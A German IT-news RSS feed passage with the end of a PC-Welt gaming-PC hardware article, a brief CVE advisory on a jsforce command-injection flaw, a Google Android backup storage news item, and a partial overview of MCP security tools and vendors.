<p>Das Betriebssystem und alle Programme dürfen auf der Solid State Drive OCZ RevoDrive 3 X2 480GB Platz nehmen. Die Flashspeicher-Festplatte arbeitet mit vier Sandforce-SF-2281-Controllern intern als Raid-0-Verbund. Dadurch erreicht die SSD eine Datentransferrate von in der Spitze fast 1400 Megabyte pro Sekunde und einen Befehlsdurchsatz von bis zu 230.000 IOPS beim zufälligen Schreiben von 4-KB-Blöcken. Eine herkömmliche SATA-Schnittstelle würde das OCZ-Modell ausbremsen, deswegen setzt das RevoDrive auf einen PCI-Express-Anschluss.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a23f8a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/OCZ-RevoDrive-3-X2.jpg?quality=50&amp;strip=all" alt="OCZ RevoDrive 3 X2: SSD der Höllenmaschine 4" class="wp-image-3188932" width="1024" height="725" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Die erste SSD in einer Höllenmaschine: OCZ RevoDrive 3 X2</figcaption></figure><p class="imageCredit">OCZ/Kioxia </p></div>



<p>Das interne Backup übernimmt ein RAID-5‑Verbund aus vier 1-Terabyte-Festplatten. Dabei kommt das derzeit schnellste 3,5-Zoll-Laufwerk im Test zum Einsatz, die <a href="https://web.archive.org/web/20121006075341/http://www.pcwelt.de/produkte/Test-Western-Digital-VelociRaptor-WD1000D-Festplatte-5763554.html">Western Digital VelociRaptor WD1000DHTZ</a>. Die VelociRaptor rotiert mit 10.000 Umdrehungen pro Minute und puffert Zugriffe in einem 64 MB großen Cache. Die maximale Datenrate der Festplatte liegt bei 210 Megabyte pro Sekunde, die durchschnittliche Zugriffszeit bei 3,7 Millisekunden. Als RAID-5‑Verbund kommt das Platten-Quartett auf bis zu 560 Megabyte pro Sekunde und stellt dabei noch knapp 2,7 Gigabyte nutzbare Kapazität zur Verfügung.</p>



<p>Die Aufgabe des klassischen Massenspeichers für umfangreiche Foto-, Musik- und Videosammlungen übernehmen die beiden 3,5-Zoll-Festplatten <a href="https://web.archive.org/web/20120922021349/http://www.pcwelt.de/produkte/Test-Western-Digital-Caviar-Green-WD30EZRX-6091202.html">Western Digital Caviar Green 3000GB WD30EZRX</a>. Die besonders stromsparenden Laufwerke stecken in den zwei abschließbaren Hot-Swap-Schächten der Höllenmaschine 4. So lassen sich schnell und bequem knapp 5,5 Terabyte nutzbarer Speicherplatz im laufenden Betrieb an- und abstöpseln oder auch mal unkompliziert von A nach B tragen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Stromversorgung: bis zu 105 Ampere auf der 12-Volt-Schiene</h2>



<p>Keine Kompromisse machen wir bei der Stromversorgung der Höllenmaschine 4. Das <a href="https://web.archive.org/web/20121005045440/http://coolermaster.de/product.php?product_id=6744" target="_blank" rel="noreferrer noopener">Cooler Master Silent Pro Hybrid 1300W</a> bietet genügend Reserven, um alle Komponenten zuverlässig mit Energie zu versorgen. Das vollständig modulare Netzteil stellt auf der 12-Volt-Schiene in der Spitze bis zu 105 Ampere bereit und federt damit auch locker die Lastspitzen der stromhungrigen Grafikkarten ab.</p>



<p>Aufgrund der “<a href="https://web.archive.org/web/20121005072013/http://www.plugloadsolutions.com/80PlusPowerSupplies.aspx">80 PLUS Gold</a>“-Zertifizierung arbeitet das ATX-2.3-Kraftpaket mit einem Wirkungsgrad von über 90 Prozent trotzdem sehr energieeffizient. Dank der semipassiven Kühlung ist das 1300-Watt-Netzteil aber auch flüsterleise. Zudem erlaubt die im Lieferumfang enthaltene 5,25-Zoll-Lüftersteuerung neben dem automatischen Modus ein stufenlos regulierbares Drehtempo für den 130-Millimeter-Lüfter – bei harter Dauerbelastung drehen Sie den Regler einfach voll auf.</p>



<p>Um optische Massenspeicher kümmert sich der Blu-ray-Brenner <a href="https://web.archive.org/web/20120905095420if_/http://www.asus.de/Optical_Storage/Internal_Bluray_Drive/BW12B1ST/">Asus BW-12B1ST</a>. Das Multi-Norm-Laufwerk versteht sich aber auch auf alle gängigen CD- und DVD-Formate. Bei maximal 12-fachem Schreibtempo füllt das Asus-Modell einen einlagigen 25-GB-BR-Rohling in rund 11 Minuten. BD-REs beschreibt das SATA-Laufwerk mit 2-fachem Tempo, Blu-ray-Medien liest er mit 8-facher Geschwindigkeit. Im Lieferumfang des Asus BW-12B1ST ist Software für das Backup, Brennen und Abspielen von Blu-rays enthalten.</p>



<h2 class="wp-block-heading toc">Peripherie: Luxus-Eingabegeräte und 5.1-Raumklang</h2>



<p>Die <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121027093942/http://www.logitech.com/de-de/mice-pointers/mice/5092">Logitech G9x Laser Mouse</a> kommt mit einem 4-Wege-Scrollrad und löst mit bis zu 5700 dpi auf. Die USB-Maus besitzt eine anpassbare Griffschale sowie ein bis auf 28 Gramm aufrüstbares Gewichtsmagazin. Der interne Speicher sichert bis zu fünf Profile für individuelle Tastatur-Makros und Abtastraten.</p>



<p>Das <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121007015940/http://www.logitech.com/de-de/keyboards/keyboards/4956">Logitech G19 Gaming Keyboard</a> besitzt ein integriertes Farb-LCD, das in Echtzeit Spiele-Informationen wie die Server-IP-Adresse oder den Punktestand für über 35 Titel anzeigt. Die G19 erlaubt verschiedene Beleuchtungsfarben und hat 12 voll programmierbare G-Tasten sowie Sondertasten für den schnellen Multimedia-Zugriff. Das Logitech-Modell fungiert aber auch als aktiver 2-fach-USB-Hub und überrascht mit einer Kabelführung auf der Unterseite für Maus und Headset.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a247c5"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Logitech-G19-Gaming-Keyboard.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Logitech G19 Gaming Keyboard" class="wp-image-3190427" width="1200" height="816" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Logitech</p></div>



<p>Das THX-zertifizierte Lautsprecherset <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20120927123116/http://www.logitech.com/de-de/speakers-audio/home-pc-speakers/speaker-system-Z906">Logitech Z906</a> bietet 5.1-Raumklang mit digitaler Dolby- und DTS-Decodierung. Bis zu sechs digitale und analoge Audioquellen lassen sich gleichzeitig an die Bedienkonsole anschließen. Alternativ bedienen Sie das 500-Watt-Lautsprechersystem kabellos über die Fernbedienung.</p>



<p>Wer nachts die Nachbarn nicht stören darf, greift zum <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121014132143/http://www.logitech.com/de-de/gaming/headsets/7248">Logitech G930 Wireless Gaming Headset</a>. Das funkt digital mit 2,4 Gigahertz zehn Stunden lang über eine Reichweite von bis zu 12 Metern. Das Headset kommt mit drei programmierbaren Tasten, Geräuschunterdrückung und Kondensatormikrofon. Dank der Dolby-Technik Headphone und Pro Logic II kann das G930 sogar 7.1-Surround-Sound simulieren.</p>



<h2 class="wp-block-heading toc">Kreativ-, Spiele- und Office-Paket für 4000 Euro</h2>



<p>Auf der Höllenmaschine 4 vorinstalliert haben wir das 64-Bit-Betriebssystem <a href="https://web.archive.org/web/20121004014010/http://www.pcwelt.de/special/Windows-7-1001833.html">Windows 7 Ultimate</a>. Für das Microsoft-Betriebssystem haben wir uns auch wegen der DirectX-11-Unterstützung entschieden. Das laut Windows-Experte Hermann Apfelböck “beste Windows aller Zeiten” verwöhnt in der multilingualen Ultimate-Variante mit den exklusiven Funktionen Bitlocker-Verschlüsselung und dem nützlichen VHD-Boot.</p>



<p>Dazu gibt es drei fette Software-Pakete frei Haus. Das Highlight für Kreative ist die <a href="https://web.archive.org/web/20120701102134/http://success.adobe.com/de/de/sem/products/creativesuite/dwp.html">Adobe Creative Suite 6 Design &amp; Web Premium</a>. Die „Rundum glücklich“-Lösung für professionelle Bildbearbeitung, Layout und Website-Design integriert die Digital Publishing Suite und enthält folgende Programme und Werkzeuge: Acrobat X Pro, Bridge, Dreamweaver, Flash Builder, Flash Professional, Fireworks, Illustrator, InDesign, Media Encoder und Photoshop Extended.</p>



<p>Was zum Spielen spendiert Grafikspezialist Nvidia der Höllenmaschine 4. Das Gaming-Paket enthält die AAA-Titel Alan Wake Collector’s Edition, Batman: Arkham City, Battlefield 3, Borderlands, Call of Duty: Modern Warfare 3, Crysis 2, Diablo 3, Deus Ex: Human Revolution, Duke Nukem Forever, L.A. Noire, Mass Effect 3, Max Payne 3, Metro 2033, Rage, Skyrim, Starcraft II: Wings of Liberty, Star Wars. The Old Republik, The Witcher 2: Assassins of Kings.</p>



<p>Und wer die Höllenmaschine im Büroeinsatz unterfordern will, installiert <a href="https://web.archive.org/web/20101125155934/http://www.pcwelt.de/news/Jetzt-fuer-alle-Microsoft-Office-2010-ab-sofort-verfuegbar-988766.html">Microsoft Office Professional 2010</a>. Das Paket enthält die Programme Access, Excel, InfoPath, OneNote, Outlook, Powerpoint, Publisher, SharePoint, Word und Workspace.</p>



<p>Hinweis: Hier endet der Artikel über die Höllenmaschine 4 aus dem Jahre 2014.</p>



<h2 class="wp-block-heading toc">So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern:</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16489 | jsforce up to 3.10.16 SFDX Connection Registry lib/registry/sfdx.js _execCommand os command injection (Issue 1805 / EUVD-2026-47593)]]></title>
<description><![CDATA[A vulnerability was found in jsforce up to 3.10.16. It has been classified as critical. This issue affects the function _execCommand in the library lib/registry/sfdx.js of the component SFDX Connection Registry. The manipulation leads to os command injection.

This vulnerability is referenced as ...]]></description>
<link>https://tsecurity.de/de/3685651/sicherheitsluecken/cve-2026-16489-jsforce-up-to-31016-sfdx-connection-registry-libregistrysfdxjs-execcommand-os-command-injection-issue-1805-euvd-2026-47593/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685651/sicherheitsluecken/cve-2026-16489-jsforce-up-to-31016-sfdx-connection-registry-libregistrysfdxjs-execcommand-os-command-injection-issue-1805-euvd-2026-47593/</guid>
<pubDate>Wed, 22 Jul 2026 10:31:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/jsforce">jsforce up to 3.10.16</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects the function <code>_execCommand</code> in the library <em>lib/registry/sfdx.js</em> of the component <em>SFDX Connection Registry</em>. The manipulation leads to os command injection.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-16489">CVE-2026-16489</a>. The attack can only be performed from a local environment. Furthermore, an exploit is available.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern kein Gratis-Backup mehr: Schonfrist von 45 Tagen]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3685609/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685609/it-nachrichten/google-erlaubt-android-nutzern-kein-gratis-backup-mehr-schonfrist-von-45-tagen/</guid>
<pubDate>Wed, 22 Jul 2026 10:19:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer gilt die Änderung seit dem<strong> 7. Juli 2026</strong>. Für bestehende Nutzer gilt eine Schonfrist von <strong>45 Tagen</strong>, bis sie in Kraft tritt. Google informiert Nutzer per Mail dazu:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Wir möchten dich über eine bevorstehende Aktualisierung unserer Speicherrichtlinien informieren. Außerdem führen wir neue Steuerelemente ein, mit denen du deine Android-Sicherungen besser verwalten kannst.</p>



<p><strong>Richtlinienänderung:</strong> In 45 Tagen werden alle Daten, die in den Sicherungen deines Android-Geräts enthalten sind, auf das Speicherplatzlimit deines Google-Kontos angerechnet. Fotos und Videos in Google Fotos und MMS-Daten werden bereits jetzt in deinen Google-Kontospeicherplatz einbezogen. Mit dieser Änderung werden auch alle anderen gesicherten Daten wie SMS, Anruflisten, Geräteeinstellungen und App-Einstellungen auf deinen Google-Kontospeicherplatz angerechnet. Nach Inkrafttreten dieser Richtlinie wird deine Gerätesicherung möglicherweise mehr Speicherplatz belegen. Wenn das Speicherplatzlimit deines Google-Kontos überschritten ist, werden automatische Sicherungen pausiert, bis du Speicherplatz freigibst oder dein Abo upgradest.</p>
</blockquote>



<p>Laut Google werden die Auswirkungen dieser Änderung recht begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa <strong>40 Megabyte</strong> zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere <a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Backup-Methoden</a> setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tools, um MCP-Server abzusichern]]></title>
<description><![CDATA[width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px">Unabhängig davon, welche MCP-Server Unternehmen wofür einsetzen – “Unsicherheiten” sollten dabei außenvorbleiben.Gorodenkoff | shutterstock.com



Model Context Protocol (MCP) verbindet KI-Agenten mit Datenquellen und erfre...]]></description>
<link>https://tsecurity.de/de/3685216/it-security-nachrichten/tools-um-mcp-server-abzusichern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685216/it-security-nachrichten/tools-um-mcp-server-abzusichern/</guid>
<pubDate>Wed, 22 Jul 2026 06:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Unabhängig davon, welche MCP-Server Unternehmen wofür einsetzen – “Unsicherheiten” sollten dabei außenvorbleiben.</figcaption></figure><p class="imageCredit">Gorodenkoff | shutterstock.com</p></div>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.computerwoche.de/article/4031227/was-ist-model-context-protocol.html" target="_blank">MCP</a>) verbindet KI-Agenten mit Datenquellen und erfreut sich im Unternehmensumfeld wachsender Beliebtheit. Allerdings ist auch MCP nicht frei von Sicherheitslücken, wie entsprechende Entdeckungen, etwa beim SaaS-Anbieter <a href="https://www.upguard.com/blog/asana-discloses-data-exposure-bug-in-mcp-server" target="_blank" rel="noreferrer noopener">Asana</a> oder dem IT-Riesen <a href="https://www.catonetworks.com/blog/cato-ctrl-poc-attack-targeting-atlassians-mcp/" target="_blank" rel="noreferrer noopener">Atlassian</a> gezeigt haben. Inzwischen hat sich jedoch einiges in Sachen MCP-Sicherheit getan. Einerseits wurden mit Blick auf das Kernprotokoll etliche Fortschritte erzielt. Beispielsweise in Form von Support für OAuth sowie für Authentifizierungs-Server von Drittanbietern und Identity-Management-Systeme. Darüber hinaus wurde inzwischen auch eine <a href="https://modelcontextprotocol.info/tools/registry/" target="_blank" rel="noreferrer noopener">offizielle MCP Registry</a> geschaffen, die einen Überblick über sichere, öffentlich verfügbare MCP-Server bietet.</p>



<p class="wp-block-paragraph">Dennoch bestehen weiterhin Sicherheitslücken, die sich für diverse Cyberschandtaten ausnutzen lassen – <a href="https://www.computerwoche.de/article/4044551/wenn-der-ki-agent-im-fakeshop-kauft.html" target="_blank">Prompt Injection</a>, Tool Poisoning, Token-Diebstahl, Server-übergreifende Attacken oder manipulierte Messages sind nur einige von vielen Beispielen. Mit anderen Worten: Unternehmen, die sich beim <a href="https://www.computerwoche.de/article/4049237/3-tipps-um-agentic-ai-systeme-in-der-cloud-zu-entwickeln.html" target="_blank">Aufbau von Agentic-AI-Systemen</a> einen Wettbewerbsvorteil verschaffen wollen, müssen erhebliche Anstrengungen unternehmen, um zu gewährleisten, dass sensible Daten nicht nach außen dringen. Glücklicherweise gibt es diverse Tools, die dabei Unterstützung versprechen.</p>



<p class="wp-block-paragraph">In diesem Artikel lesen Sie:</p>



<ul class="wp-block-list">
<li>was Security-Tools für MCP leisten sollten, und</li>



<li>welche Angebote in diesem Bereich interessant sind.</li>
</ul>



<h2 class="wp-block-heading">Das sollten MCP-Sicherheitslösungen können</h2>



<p class="wp-block-paragraph">Die Gefahr von Datenlecks, Prompt Injections und weiteren Sicherheitsbedrohungen besteht unabhängig davon, ob Unternehmen:</p>



<ul class="wp-block-list">
<li>ihre eigenen KI-Agenten mit MCP-Servern von Drittanbietern,</li>



<li>ihre eigenen MCP-Server mit Drittanbieter-Agenten, oder</li>



<li>ihre eigenen Server mit den eigenen Agenten verbinden.</li>
</ul>



<p class="wp-block-paragraph">Soll heißen: Unternehmen müssen in jedem Fall Autorisierungen und Berechtigungen überprüfen, detaillierte Zugriffskontrollen implementieren und alles protokollieren. Daraus ergeben sich auch die Anforderungen für MCP-Sicherheitslösungen. Diese sollten bieten:</p>



<ul class="wp-block-list">
<li><strong>MCP-Servererkennung.</strong> Für Mitarbeiter eines Unternehmens ist es einfach, MCP-Server herunterzuladen und zu nutzen. Mit Scan-Services für MCP-Server können Unternehmen sämtliche Instanzen von Schatten-MCP-Servern in ihrer Umgebung finden.</li>



<li><strong>Laufzeitschutz.</strong> KI-Agenten kommunizieren mit MCP-Servern in natürlicher Sprache. MCP-Sicherheits-Tools sollten deshalb in der Lage sein, diese Kommunikation auf Sicherheitsprobleme wie Prompt Injections hin zu überwachen.</li>



<li><strong>Authentifizierungs- und Zugriffskontrollen.</strong> Das MCP-Protokoll unterstützt inzwischen OAuth, aber das ist nur ein erster Schritt. Für zusätzliche Sicherheit empfehlen sich Tools mit integrierten Kontroll-Frameworks für Zero Trust und Least Privilege.</li>



<li><strong>Logging und Observability.</strong> Tools und Plattformen sollten zudem die Möglichkeit bieten, MCP-Protokolle zu sammeln, Sicherheitsteams über Richtlinienverstöße zu informieren, Compliance-Daten zu erfassen oder Protokolle in die bestehende Sicherheitsinfrastruktur einzuspeisen.</li>
</ul>



<h2 class="wp-block-heading">MCP-Security-Angebote</h2>



<p class="wp-block-paragraph">Im Folgenden haben wir die Anbieter von MCP-Security-Tools in drei Kategorien aufgeteilt. Diese Aufstellung erhebt keinen Anspruch auf Vollständigkeit.</p>



<p class="wp-block-paragraph"><strong>Hyperscaler</strong></p>



<p class="wp-block-paragraph">Für Unternehmen, die sich vollständig auf eine bestimmte Cloud-Plattform verlassen, bieten die MCP-Tools des jeweiligen Hyperscalers einen einfachen Einstieg.</p>



<ul class="wp-block-list">
<li><strong>Amazon Web Services (AWS)</strong> hat Mitte 2025 seine eigene agentenbasierte KI-Plattform eingeführt. <a href="https://aws.amazon.com/de/bedrock/agentcore/" target="_blank" rel="noreferrer noopener">Amazon Bedrock AgentCore</a> umfasst ein Gateway, das mehrere Protokolle unterstützt (darunter auch MCP), ein Identity-Management-System sowie Observability.</li>



<li><strong>Microsoft</strong> bietet einen grundlegenden <a href="https://learn.microsoft.com/de-de/azure/developer/azure-mcp-server/overview" target="_blank" rel="noreferrer noopener">Azure-MCP-Server</a> an, inklusive Support für Azure Key Vault. Darüber hinaus unterstützen auch Azure AI Foundry Agent Service und Azure API Management das Model Context Protocol. Zudem bietet Microsoft mit dem <a href="https://learn.microsoft.com/de-de/agent-framework/overview/agent-framework-overview" target="_blank" rel="noreferrer noopener">Agent Framework</a> auch ein Open-Source-Entwicklungskit, das sowohl MCP als auch Agent2Agent unterstützt und beispielsweise Schutz vor Prompt Injections verspricht.</li>



<li><strong>Google Cloud</strong> kündigte Anfang 2025 seine <a href="https://cloud.google.com/blog/products/ai-machine-learning/mcp-toolbox-for-databases-now-supports-model-context-protocol?hl=en" target="_blank" rel="noreferrer noopener">MCP Toolbox für Datenbanken</a> an – inklusive integrierter Authentifizierung und Observability. Außerdem hat der Hyperscaler auch <a href="https://cloud.google.com/blog/products/identity-security/how-to-secure-your-remote-mcp-server-on-google-cloud?hl=en" target="_blank" rel="noreferrer noopener">eine Referenzarchitektur</a> veröffentlicht, um MCP-Server auf seiner Cloud-Plattform abzusichern.</li>
</ul>



<p class="wp-block-paragraph"><strong>Große Plattformanbieter</strong></p>



<ul class="wp-block-list">
<li>Der IT-Dienstleister <strong>Cloudflare</strong> hat mit <a href="https://blog.cloudflare.com/zero-trust-mcp-server-portals/" target="_blank" rel="noreferrer noopener">MCP Server Portals</a> ein Tool veröffentlicht, mit dem Unternehmen MCP-Verbindungen zentralisiert absichern und überwachen können. Die Funktion ist Bestandteil der Cloudflare-One-Plattform.</li>



<li><strong>Palo Alto Networks</strong> hat mit Blick auf MCP-Sicherheit mehrere Eisen im Feuer. Mit <a href="https://www.paloaltonetworks.com/blog/2025/06/securing-ai-agent-innovation-prisma-airs-mcp-server/" target="_blank" rel="noreferrer noopener">Prisma AIRS</a> hat das Unternehmen einen eigenen, intermediären MCP-Server veröffentlicht. Dieser sitzt zwischen den KI-Agenten und dem eigentlichen MCP-Server und erkennt schadhafte Inhalte und Daten. Das Tool <a href="https://www.paloaltonetworks.com/blog/2025/06/cloud-security-model-context-protocol-mcp-security/" target="_blank" rel="noreferrer noopener">MCP Security</a> ist hingegen Bestandteil von Cortex Cloud WAAS und überprüft die MCP-Kommunikation an der Netzwerkgrenze auf bösartige Aktivitäten.</li>



<li><strong>SentinelOne</strong> gewährt mit seiner <a href="https://www.sentinelone.com/blog/avoiding-mcp-mania-how-to-secure-the-next-frontier-of-ai/" target="_blank" rel="noreferrer noopener">Singularity Platform</a> ebenfalls Einblick in die MCP-Interaktionskette und bietet zum Beispiel Warnmeldungen und automatisierte Incident Response für MCP-Server auf lokaler oder Remote-Ebene.</li>



<li>Die <a href="https://acuvity.ai/" target="_blank" rel="noreferrer noopener">Plattform</a> von <strong>Acuvity</strong> (seit Februar 2026 Teil von <strong>Proofpoint</strong>) verspricht, MCP-Server umfassend abzusichern. Dafür sorgt laut dem Anbieter eine Kombination aus Least-Privilege-Execution, unveränderlichen Laufzeiten, kontinuierlichen Schwachstellenscans, Authentifizierung und Bedrohungserkennung.</li>



<li>Daneben hat auch <strong>Broadcom</strong> MCP-Sicherheitsfunktionen für VMware Cloud Foundation <a href="https://www.broadcom.com/company/news/product-releases/63401" target="_blank" rel="noreferrer noopener">angekündigt</a>, die künftig mehr Sicherheit für agentenbasierte Workflows gewährleisten sollen.</li>
</ul>



<p class="wp-block-paragraph"><strong>Startups</strong></p>



<ul class="wp-block-list">
<li>Das API-Security-Startup <strong>Akto</strong> hat eine <a href="https://www.akto.io/mcp-security" target="_blank" rel="noreferrer noopener">MCP-Security-Plattform</a> im Angebot. Sie umfasst ein Discovery Tool, um MCP-Server in Unternehmensumgebungen zu identifizieren, Security-Testing-Werkzeuge sowie Monitoring- und Threat-Detection-Funktionen.</li>



